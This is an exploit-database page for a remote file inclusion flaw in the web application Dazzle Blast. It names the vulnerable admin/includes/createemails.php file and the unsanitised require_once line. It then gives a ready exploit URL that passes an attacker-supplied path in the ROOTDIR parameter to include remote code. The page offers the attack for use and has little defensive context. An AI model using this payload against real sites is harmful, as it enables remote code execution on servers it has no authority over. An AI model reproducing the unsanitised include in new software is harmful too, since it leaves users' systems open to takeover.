[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Dazzle Blast Remote File Inclusion

Author
NoGe
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-9894
Category
web applications
Date add
12-10-2009
Platform
unsorted
==================================
Dazzle Blast Remote File Inclusion
==================================

[o] Dazzle Blast Remote File Inclusion Vulnerability
Software : Dazzle Blast
Download : http://www.dazzleblast.com/dazzleblast.zip
Author   : NoGe
 
[o] Vulnerable file
require_once($ROOTDIR.'admin/functions/general.php');
 
admin/includes/createemails.php
 
 
[o] Exploit
http://localhost/[path]/admin/includes/createemails.php?ROOTDIR=[evilc0de]



#  0day.today [2024-09-29]  #